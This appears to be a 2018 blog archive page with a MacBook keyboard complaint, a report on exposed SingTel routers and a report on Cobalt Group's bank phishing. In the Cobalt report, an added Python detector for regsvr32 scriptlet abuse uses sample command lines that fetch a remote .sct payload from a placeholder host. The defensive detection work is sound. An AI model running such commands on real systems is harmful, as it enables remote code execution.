Month: May 2018

My experience with the MacBook Pro keyboard debacle and what an Apple Store did for me

By: Dan Uff, Senior Editor, CompuScoop.com

The other day, I was working on my 2017 MacBook when the down arrow key felt funny.  Then, without warning, the down arrow key came off with my finger when I used it.

Thinking it was an isolated problem, and for the hell of it, I decided to do a search on YouTube to see if anyone else was having a problem with the keyboard. Much to my surprise, I found over 200 YouTube videos describing almost the same problem as me. As it turns out, the problem seems to be a flaw in the design of Apple's new butterfly keyboard. While some problems were fixed by spraying the keyboard with a can of air, other users found that the internal design of the butterfly keys breaks the actual key and (in my case) actually cracks it.

After putting up with the problem for a day, I decided to make an appointment to take it in to my local Apple Store to have it looked at. When I told the Apple Genius, he took the computer back and actually took the affected key off (or it fell off, one of the two). He then verified that the actual key was cracked. So I had two choices: he could try to clean the affected key and hope the problem doesn't happen again, or I could get the whole keyboard replaced for a minimum charge of $420.00. I voted for him to clean the key and hope it doesn't happen again, because I am on a limited income and could not afford the fee.

I am writing this to let other MacBook Pro users know that they are NOT ALONE, and to ask Apple to do a mandatory recall on these keyboards, because I am not the only one who has this problem, and to make things right with their customers.

What do YOU think?  Comment below.

P.S.  I forwarded this letter to Apple's CEO, Tim Cook.  I'll report if someone gets back to me about the above.

Singapore ISP Leaves 1,000 Routers Open to Attack

Southeast Asian telecom giant Singapore Telecommunications Limited left approximately 1,000 customer routers wide open to a potential attack via an unprotected port. The flub occurred after the region’s largest ISP conducted remote maintenance on affected routers and failed to secure the equipment when the work was complete, according to NewSky Security.

“The root cause was that port forwarding was enabled by the SingTel customer service staff to troubleshoot WiFi issues for their customers and it was not disabled when the issues were resolved,” said Ankit Anubhav, principal security researcher at NewSky Security, who discovered the security lapse last week.

NewSky Security alerted the region’s Singapore Computer Emergency Response Team (SingCERT) that worked with Singapore Telecommunications Limited (SingTel) to resolve the issue.

“The ISP SingTel has disabled port forwarding to port 10,000 for the affected routers… ISP SingTel will be taking measures to ensure that port forwarding is disabled after troubleshooting has completed,” said Douglas Mun, deputy director of SingCERT at the Cyber Security Agency of Singapore.

SingTel did not respond to a Threatpost request for comment for this story. The researcher identified the impacted routers as part of Singtel’s own branded Wifi Gigabit Routers. According to NewSky, affected routers have been secured.

The open port left routers vulnerable to a number of different types of attack. “A hacked router can allow an attacker to reconfigure the router to re-route traffic, monitor the data packets, or even plant a malware,” Anubhav wrote in a post describing his discovery, published Monday.

He asserts that even with heightened awareness around insecure routers and IoT devices, spurred by Mirai and other similar attacks, errors like this are still too common. “On connecting through this port, we observed that one can get complete access to these devices as there was no authentication set on these devices,” Anubhav wrote. “The login feature of these devices was set to be disabled.”

That allowed researchers to use Shodan to scan for port 10,000 on the SingTel routers and log in as the device’s admin. Once in, researchers said, attackers would not only be able to manipulate or snoop on network traffic, but would also have easy access to devices on the compromised network.

Routers are juicy targets for hackers looking to plant malware and for cybercriminals perpetrating DNS hijacking of unsecured WiFi routers.

Earlier this month, Anubhav identified 5,000 Datacom routers with no Telnet password tied to a Brazilian ISP, Oi Internet. Last week, the FBI warned of malware called VPNFilter that it said had infected 500,000 routers tied to brands Linksys, MikroTik, NETGEAR and TP-Link. Also last week, Comcast patched a bug that under certain conditions leaked customer SSID names and passwords of Xfinity routers.

Despite Ringleader’s Arrest, Cobalt Group Still Active

Evidence has surfaced that the Cobalt Group – the threat actors behind widespread attacks on banks and ATM jackpotting campaigns across Europe – is continuing to operate, despite the arrest of its accused ringleader in March.

The Cobalt Group first burst onto the scene in 2016: in a single night, the group stole the equivalent of over $32,000 (in local currency) from six ATMs in Eastern Europe. Throughout 2017 the group expanded its focus to financial-sector phishing schemes and new regions, including North and South America, as well as Western Europe. Researchers estimated that in the first six months of 2017 Cobalt sent phishing messages with malicious attachments to over 3,000 users at 250 companies in 13 countries.

In a report released last week (PDF) by Positive Technologies, researchers there said that in mid-May 2018 they detected a phishing campaign directed at the financial sector whose ultimate goal is downloading a JavaScript backdoor onto targets’ computers. Researchers found the backdoor to be loaded up with malevolent functions, including cyberespionage and the ability to launch programs, along with the ability to update itself, remove itself and detect antivirus software. It also encrypts its communications with the C2 server with RC4. In all, its capabilities mirror the backdoor that Cobalt Group has been known to employ in the past, researchers said.

“Although [Positive Technologies] specialists did not detect use of the Cobalt Strike tool which gave the group its name, the techniques and tactics are strongly suggestive of the group’s previous attacks,” they noted.

Cobalt typically employs a number of techniques to evade user scrutiny and spam filters. The group hacks weakly protected public sites, which it uses to host malware. It sends fake messages that appear to come from financial regulators and company partners, and targets both work and personal addresses of employees. In most cases, the goal of phishing messages is to compromise bank systems used for ATM management. This enables infecting ATMs with malware that takes control of the cash dispenser. During the final stage of the attack, money mules collect cash from the hacked ATMs.

The new May campaign bore all of the hallmarks of the group beyond just the payload. For one, the phony messages were sent from a domain whose structure is identical to those previously used by the bad actors. These messages also have a link that points to a malicious document weaponized with three exploits for remote code execution in Microsoft Word (CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802), generated by the Threadkit exploit kit. This kill chain is the same as that of a Cobalt Group campaign detected in February.

“Cobalt relies on social engineering for the first stage of attacks, and for good reason: almost 30 percent of recipients click links in phishing messages, as our statistics show,” explained Andrew Bershadsky, PT CTO, adding that in 27 percent of cases, recipients click links in phishing messages. Attackers are often able to draw employees into correspondence (and even security staff, in 3 percent of cases). And if a message is sent from the address of a real company (a technique used by Cobalt), attackers’ success rate jumps to 33 percent.

As for how the rest of the May attack unfolded, PT security researchers said that once one of the exploits is triggered, a BAT script runs that launches a standard Windows utility that allows bypassing AppLocker, as well as downloading and running SCT or COM objects using the standard Windows utility regsvr32.exe. The utility in turn downloads the COM-DLL-Dropper, which then fetches the backdoor.
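The regsvr32.exe scriptlet step in the kill chain above is a well-known detection point (MITRE ATT&CK T1218.010). Below is an added example, not code from the Positive Technologies report or from Threatpost, that runs a simple detection over constructed process-creation events; the command lines, paths and URLs are placeholders I made up, not indicators from the page.

```python
"""Flag regsvr32.exe invocations that fetch a remote scriptlet (.sct) or load
scrobj.dll, the behaviour the PT report attributes to the Cobalt kill chain.

The events below are constructed samples, not real telemetry.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Constructed sample events; the URL and UNC path are placeholders, not IoCs.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32.exe /s /n /u /i:http://example.invalid/payload.sct scrobj.dll"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'),  # benign install
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32 /u /s /i:\\fileshare\public\update.sct scrobj.dll"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

# /i: followed by an http(s) URL or a UNC path means the scriptlet is not local.
REMOTE_SCRIPTLET = re.compile(r"/i:\s*(https?://|\\\\)", re.IGNORECASE)
SCROBJ = re.compile(r"\bscrobj\.dll\b", re.IGNORECASE)


def classify(ev: ProcEvent) -> list[str]:
    """Return the detection reasons that fire for one event (empty = not flagged)."""
    reasons: list[str] = []
    if not ev.image.lower().endswith("regsvr32.exe"):
        return reasons
    if REMOTE_SCRIPTLET.search(ev.command_line):
        reasons.append("regsvr32 /i: pointing at a remote scriptlet")
    if SCROBJ.search(ev.command_line):
        reasons.append("regsvr32 loading scrobj.dll")
    if reasons and ev.parent_image.lower().endswith("cmd.exe"):
        reasons.append("spawned from cmd.exe (consistent with a BAT stage)")
    return reasons


def find_suspicious(events: list[ProcEvent]) -> list[tuple[str, list[str]]]:
    """Return (command line, reasons) for every event that fires at least one rule."""
    flagged = []
    for ev in events:
        reasons = classify(ev)
        if reasons:
            flagged.append((ev.command_line, reasons))
    return flagged
```

Run against real Sysmon Event ID 1 or Windows 4688 data, the parent-process check is what separates a scripted stage like the one described above from an administrator registering a local DLL.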

The resurgence is notable given that the Spanish National Police arrested the Cobalt Group’s leader (also behind the Carbanak gang) on March 26. EUROPOL said that the individual was responsible for helping to attack 100 financial institutions worldwide and cause more than 1 billion EUR in damages.
